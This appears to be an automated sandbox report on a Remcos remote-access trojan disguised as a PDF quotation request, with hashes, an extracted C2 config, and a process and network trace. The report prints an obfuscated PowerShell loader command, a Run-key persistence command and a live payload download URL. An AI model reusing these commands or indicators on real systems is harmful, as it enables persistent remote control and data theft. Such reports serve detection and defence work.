Analysis
max time kernel: 26s
max time network: 26s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 30/08/2024, 13:43 UTC
Static task: static1
Behavioral task: behavioral1
Sample: RFQ-278TR8-EGUY-PDF.exe
Resource: win7-20240729-en
General
Target: RFQ-278TR8-EGUY-PDF.exe
Size: 566KB
MD5: da86655a0232359a727a091ace033894
SHA1: c5ba96e3b7f3ca40364d93852c49810c9ced5d90
SHA256: ef5e922e7e1dc762301001557f0132d702b9f927efca9f70c91fd719ea1652a2
SHA512: a58e76d31ce56e8b007518923599c2cd8cd9ec419f5cb930e2fe429e1a28256490a599d32b04cee7ca921b1e48b8c326440eade966fde62ac882e32d0494a868
SSDEEP: 12288:/TYbpC/5wByfpr4t6ssVfKF34YDc7L8lkflIQB5YT07KchD8ISNq3H:/TYdg5wByfp0UVW4YVl2I+5nKchDxSN4
Malware Config
Extracted: remcos
RemoteHost: 45.95.169.175:2404
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-W6BTEW
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\\tugthuskandidaters\\').Oxyderer;%Waylin% ($Brneblad)" | reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
pid | Process
2980 | ImagingDevices.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid | Process
2576 | powershell.exe
2980 | ImagingDevices.exe

Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 2576 set thread context of 2980 | 2576 | powershell.exe | 32

Drops file in Program Files directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files (x86)\backland\Francettes.aft | RFQ-278TR8-EGUY-PDF.exe

Drops file in Windows directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\daddies\anodiseredes.ini | RFQ-278TR8-EGUY-PDF.exe

pid | Process
2576 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ImagingDevices.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RFQ-278TR8-EGUY-PDF.exe

Modifies registry key (1 TTPs, 1 IoCs)
pid | Process
2216 | reg.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid | Process
2576 | powershell.exe
2576 | powershell.exe
2576 | powershell.exe
2576 | powershell.exe
2576 | powershell.exe
2576 | powershell.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
pid | Process
2576 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2576 | powershell.exe

Suspicious use of WriteProcessMemory (18 IoCs)
description | pid | Process | procid_target
PID 2532 wrote to memory of 2576 | 2532 | RFQ-278TR8-EGUY-PDF.exe | 29
PID 2532 wrote to memory of 2576 | 2532 | RFQ-278TR8-EGUY-PDF.exe | 29
PID 2532 wrote to memory of 2576 | 2532 | RFQ-278TR8-EGUY-PDF.exe | 29
PID 2532 wrote to memory of 2576 | 2532 | RFQ-278TR8-EGUY-PDF.exe | 29
PID 2576 wrote to memory of 2980 | 2576 | powershell.exe | 32
PID 2576 wrote to memory of 2980 | 2576 | powershell.exe | 32
PID 2576 wrote to memory of 2980 | 2576 | powershell.exe | 32
PID 2576 wrote to memory of 2980 | 2576 | powershell.exe | 32
PID 2576 wrote to memory of 2980 | 2576 | powershell.exe | 32
PID 2576 wrote to memory of 2980 | 2576 | powershell.exe | 32
PID 2980 wrote to memory of 1512 | 2980 | ImagingDevices.exe | 33
PID 2980 wrote to memory of 1512 | 2980 | ImagingDevices.exe | 33
PID 2980 wrote to memory of 1512 | 2980 | ImagingDevices.exe | 33
PID 2980 wrote to memory of 1512 | 2980 | ImagingDevices.exe | 33
PID 1512 wrote to memory of 2216 | 1512 | cmd.exe | 35
PID 1512 wrote to memory of 2216 | 1512 | cmd.exe | 35
PID 1512 wrote to memory of 2216 | 1512 | cmd.exe | 35
PID 1512 wrote to memory of 2216 | 1512 | cmd.exe | 35
Processes

RFQ-278TR8-EGUY-PDF.exe (PID 2532)
Path: C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe"
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory

  powershell.exe (PID 2576), child of PID 2532
  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell.exe" -windowstyle minimized " $Bestikke=Get-Content 'C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Untraced.Unn';$Slambassinernes=$Bestikke.SubString(53011,3);.$Slambassinernes($Bestikke)"
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    ImagingDevices.exe (PID 2980), child of PID 2576
    Path: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
    Command line: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

      cmd.exe (PID 1512), child of PID 2980
      Path: C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

        reg.exe (PID 2216), child of PID 1512
        Path: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"
        - Adds Run key to start application
        - System Location Discovery: System Language Discovery
        - Modifies registry key
Network

DNS
Remote address: 8.8.8.8:53
Request: asjstudio.cl IN A
Response: asjstudio.cl IN A 201.148.104.39

DNS
Remote address: 8.8.8.8:53
Request: asjstudio.cl IN A

HTTP
Remote address: 201.148.104.39:80
Request:
GET /cXKaAfOrdfcYdKPug104.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: asjstudio.cl
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 29 Aug 2024 08:59:18 GMT
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream
9.1kB 509.6kB 189 368

HTTP Request: GET http://asjstudio.cl/cXKaAfOrdfcYdKPug104.bin
HTTP Response: 200
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 33B
MD5: d1146584cebab9c03dcaf52946f7a18c
SHA1: cd0452fef7a4ad38b8c70895a487ecac54430fc1
SHA256: 630fb379230acf901b24a7e57cd31bd6b7a0b054e8e265b6f7ae6b7220cf41c2
SHA512: 044f3c344e47cf298b69541c5337b767f0bcca3819caff7ad68f24da72bfe36cd5dc54261b07ff2c2338ea75873523fd29b97cb728f9dde6a0882d6855273092

Filesize: 313KB
MD5: 4868e8f6d3c4a685c65a0af8b88e33a2
SHA1: 076a7cce739a778df2088a77a2978f8f8bad2bad
SHA256: 65ae30c7a987b8b3ebbc96969343ae59033c9817a3683ebb5ac999bed93cb2ab
SHA512: 9eb1c07208756befa71fdcc29be30d4ea73e3d48a9828eeb78e1851a9e287220d3e2e55aef49cc0e3ad883ef4f427367b740fb21d65b7b0e4c9e3cd5479b2814

Filesize: 51KB
MD5: bbb124a1a42a8499a391dafad534321c
SHA1: 38143905e4011753b569f3b0a0e4ba4c90a3d02c
SHA256: fccbcb9907193676c4840c9ab08ecec0058b9e650efc4971dd0d92fd15b575b5
SHA512: 01449caa6effed3f6502d5c980f9a5683d2eb99dc247d29dbb79c9737c8f59a6dc5ee787ba0ad75ab6ba2f3b8db048fd4cd76765c704b6ae76fe4e190f1b8669